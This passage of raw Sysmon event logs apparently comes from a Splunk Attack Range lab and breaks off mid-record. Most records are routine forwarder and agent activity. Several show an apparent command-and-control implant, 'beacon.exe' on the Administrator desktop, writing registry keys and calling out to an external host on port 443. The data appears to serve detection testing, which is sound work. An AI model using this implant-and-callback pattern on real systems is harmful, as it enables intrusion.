Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BF83B3F52A964A480DD4F9DE4AA58C4,SHA256=07B1782A43A152966C6BC48115AA14A443DFBCDBB251B2EB67F85245FFB0F79Dfalsetrue 23542300x800000000000000021219198Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:55.152{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC4D868EE051E12E41849EABEEA18D2B,SHA256=655CD804CD36E149DAD7BBC4AB98FAE151D0D3EF0A5149F70D5D1A7FB42251F7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057343934Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:56.700{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343933Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:56.700{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9F19B414F8EFEC1AD08F09D9100A194,SHA256=1DA8259EF65B079010E300FF6C66611F97F92EC5F8CA231B0CEE5B35D8801B9Cfalsetrue 23542300x800000000000000021219199Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:56.199{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=416C3FD83596EA0F8971273AB324442E,SHA256=E69EF17A3F1808D507FB6A1F312BCC5CF2105F5A1BCFAFFDC958C280927B4CAC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000057343932Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:56.233{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\puywnvy0.default-release\storage\default\https+++vscode.dev\idb\2366965780vbsdc-obdeew-.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EBfalsetrue 11241100x800000000000000057343936Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:57.734{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343935Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:57.733{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C967848C9BBA53679E643758CB8377D0,SHA256=CE4FE3CB765F8D7B5383EDF797FED159254A92E4F1FAD2D2FC7FA74DA034FD19falsetrue 23542300x800000000000000021219200Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:57.214{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DF10907895EB8A18A16DC834D9B884B,SHA256=AB05E43DA04618E7771F796258B4F3E1976881CE0A9C457FC82BCC2A3F93C551,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057343942Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:58.751{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343941Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:58.751{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D5215E3BCB6560AA16DA8130F0CFEDC,SHA256=BA307D472DDF50F5F5F1E3FC585505E9470D1F9751589F1E9D6A04CF49C8D653falsetrue 354300x800000000000000021219204Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:45.664{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64296-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219203Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:58.261{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FB694BBC1E1BE62DF0BA001968447F70,SHA256=32A5028C8A3B230F0646800D4300B167E444B5A540863D60DE0286BC04C51BEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219202Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:58.261{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B6B14F832FE6B4F31599C42B1F948697,SHA256=DCC02F3A910E341239BBB35D374B654E8FD46FFCE4AFB051D412155FC438CDC2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219201Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:58.261{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A63E226798F606D8F301877B31D95373,SHA256=310305A4F64009BE353D43FCAE91793D4809D195639DDD6DDB0B9BC4681A3CD8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057343940Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:58.234{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057343939Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:58.234{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CD0C60E7D25ECAAEF011D1F7CD1B5C97,SHA256=EB4632084E8028DF3263E5FD7333F4D93FCB4ADE24A0BD5879F364CE4EFA6B41falsetrue 11241100x800000000000000057343938Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:58.233{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057343937Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:58.232{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0A9D143C8427B4D0891DD82C25CBD7EE,SHA256=91A97A30FE28B4F0BF272D526873FCE864D7225613CBE4A6912A096B308AE35Afalsetrue 11241100x800000000000000057343945Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:59.765{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343944Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:14:59.765{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55853FC8CA2D72D6867BA3409825C667,SHA256=87951FEC8209C94BCAA7FD688F6E364208511CD901B2B83974FC4895685F3248falsetrue 23542300x800000000000000021219205Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:14:59.292{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FF77DD49EABFC6F7C5BA25D6B251824,SHA256=EB963CAABC65E9B4A3C40D5A2978686AAC8844D2A99BE3893238E734ED86E86C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057343943Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:29.565{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54502-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057343947Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:00.780{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343946Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:00.780{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCFCFC01C676CAD1A88B6DD642138574,SHA256=CEAB282BED9653ED67B3215F2BDD2AA40E9C715BD29522DE0C63885E05093B50falsetrue 23542300x800000000000000021219206Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:00.292{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA6245E09403290902A5CEAE6BF4BDE1,SHA256=133A8004C4155C2ADAA40CC5CBF7A85E4D735BF4DF47ED85D85E9E55E752E2C7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057343949Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:01.781{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343948Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:01.781{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C42DB9C80F0200140355D6F62D0D6B66,SHA256=DA3853C7E69CCB9265DB813A6201CDA0C79DE496CF8ECCF1B949A6EFCF5ADFE0falsetrue 23542300x800000000000000021219207Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:01.308{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81880A920765EBCD9198DBF17F9EFFB3,SHA256=CD466FB89091F4BD72D0E4EC1C6CA7B26D002B1558097A93ED71D74AD293328A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057343954Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:02.796{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343953Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:02.796{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C358C7F71AAC6132E6708E8BB9FE3A7,SHA256=5C24691976943AEFE3D5C108598DEFF7607F06EEBF2061ABE0874693569700BBfalsetrue 23542300x800000000000000021219208Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:02.323{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDE0CE4E70A5160014DB6ACE8E27B922,SHA256=420667B2F03951117A5730F1FE000BA632E32C849D157EA183603C1C1D595C32,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 12241200x800000000000000057343952Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:02.533{8B6011A9-88DD-6164-B500-00000000F101}5592C:\Users\Administrator\Desktop\beacon.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057343951Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:15:02.528{8B6011A9-88DD-6164-B500-00000000F101}5592C:\Users\Administrator\Desktop\beacon.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 18141800x800000000000000057343950Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:02.329{8B6011A9-887D-6164-2D00-00000000F101}3020\lsassC:\Windows\system32\dns.exe 11241100x800000000000000057343961Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:03.811{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343960Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:03.811{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B15DEE38A0E8DABB7D92173FD3EE2845,SHA256=5C62931A630C9451EF67447F09B578D44E200B98BEE057DE0AE6CF28FE1D4574falsetrue 23542300x800000000000000021219209Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:03.339{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDB5D0140390BB5346E854C55ACADF7A,SHA256=1939313D5EFEC1F31DFD1BF7CD55D12960166624C661D3D51A03C97F2C5119DF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057343959Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:34.601{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54503-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x800000000000000057343958Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:03.296{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057343957Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:03.296{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EB6AAC2FD73A9FB209DD6E30EE79EB0C,SHA256=C6DCECF16BA56DBF747C855AE6DFE83E730ED83EC68F9F336588264E4AA36903falsetrue 11241100x800000000000000057343956Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:03.296{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057343955Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:03.296{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CD0C60E7D25ECAAEF011D1F7CD1B5C97,SHA256=EB4632084E8028DF3263E5FD7333F4D93FCB4ADE24A0BD5879F364CE4EFA6B41falsetrue 11241100x800000000000000057343964Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:04.830{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343963Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:04.830{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F4B25D3B0396CDEB4F806B08E9D13B2,SHA256=A287DD56B5AD488C8E88B2AFF575D3C77CCC0B660893F110683B1E91862BAB16falsetrue 354300x800000000000000021219213Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:51.523{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64297-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x800000000000000021219212Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:04.339{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AD876DE1FA2DC63431E5C9604FA98B3,SHA256=075494299591CC7ED6A262904403AE7D362153BEF597D0C285614CCE8B1D0F87,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000057343962Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:34.880{8B6011A9-88DD-6164-B500-00000000F101}5592C:\Users\Administrator\Desktop\beacon.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local54504-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 23542300x800000000000000021219211Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:04.152{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=05F0678EAC7411914384F870D048218F,SHA256=2DD531E8285F1EDEBA0E0AA53A7BCD870F5DEF1B349FD96D2D1BA8F73D169861,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219210Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:04.152{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FB694BBC1E1BE62DF0BA001968447F70,SHA256=32A5028C8A3B230F0646800D4300B167E444B5A540863D60DE0286BC04C51BEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057343966Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:05.848{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343965Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:05.848{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=837386EC8B05C0512E8F796F7D4AEE9B,SHA256=68D6D8509C4068CC33BB6A9B8092C8486AC10D993187256E62DAE51799BF2F7Ffalsetrue 23542300x800000000000000021219214Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:05.339{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FC277A57A76E4F61108940EC6236CEB,SHA256=FA7AD7744D91A950F094059334A283B36FE013C7AE181747A318539959B430E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057343975Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:06.880{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057343974Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:06.880{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56EAF02555F7A18DA0F608BC605D34B7,SHA256=C5BB242CB098CD6CFC7317F5277C10C1CB223131C21B493FC0F708CB3F203E26falsetrue 23542300x800000000000000021219215Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:06.339{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB71019A7D1D642B0DD3331CC34D5A15,SHA256=801951EF252DE63A716E6B5E03CF8797060C8AC64D4FAA8B48452596BF6AF52A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000057343973Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:06.751{8B6011A9-887D-6164-2C00-00000000F101}2924NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0babd73079828ea96\channels\health\respondent-20211011185456-44544MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63Bfalsetrue 11241100x800000000000000057343972Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:06.750{8B6011A9-887F-6164-4300-00000000F101}3568C:\Program Files\Amazon\SSM\ssm-agent-worker.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0babd73079828ea96\channels\health\tmp\respondent-20211011185456-445442021-11-12 12:15:06.750 11241100x800000000000000057343971Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:06.749{8B6011A9-887D-6164-2C00-00000000F101}2924C:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0babd73079828ea96\channels\health\tmp\surveyor-20211011185454-445452021-11-12 12:15:06.749 23542300x800000000000000057343970Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:06.248{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla 